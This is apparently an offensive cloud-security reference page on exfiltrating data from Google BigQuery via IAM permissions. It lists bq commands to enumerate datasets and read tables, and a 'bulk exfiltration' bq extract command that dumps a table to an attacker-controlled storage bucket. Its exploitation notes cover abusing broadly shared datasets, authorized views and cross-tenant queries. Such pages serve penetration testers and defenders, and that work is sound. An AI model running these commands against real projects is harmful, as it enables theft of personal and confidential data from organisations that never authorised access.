BigQuery is a serverless warehouse reached entirely through IAM. A principal with bigquery.tables.getData and bigquery.jobs.create reads any table it is granted, and the warehouse usually holds the crown-jewel data: events, PII, and analytics exports. Exfiltration is a query away, or an extract job to a bucket for bulk.
Enumerating and reading#
bq ls --project_id <proj>
bq ls <proj>:<dataset>
bq show --schema <proj>:<dataset>.<table>
bq query --use_legacy_sql=false 'SELECT * FROM `proj.dataset.table` LIMIT 1000'
Bulk exfiltration#
# dump a table to a bucket you control
bq extract --destination_format=NEWLINE_DELIMITED_JSON \
proj:dataset.table gs://<attacker-or-reachable-bucket>/out-*.json
Exploitation notes#
- Dataset IAM is separate from project IAM: a dataset shared with
allAuthenticatedUsersor a broad group is readable even without a project-level role. - Authorized views and routines can leak rows from datasets you cannot read directly; enumerate them.
- Query results and cached tables persist;
bigquery.jobs.createplus aSELECTacross tenants is a quiet read.
Tools#
- bq / gcloud (
bq query,bq extract). - BigQuery API client libraries for scripted pulls.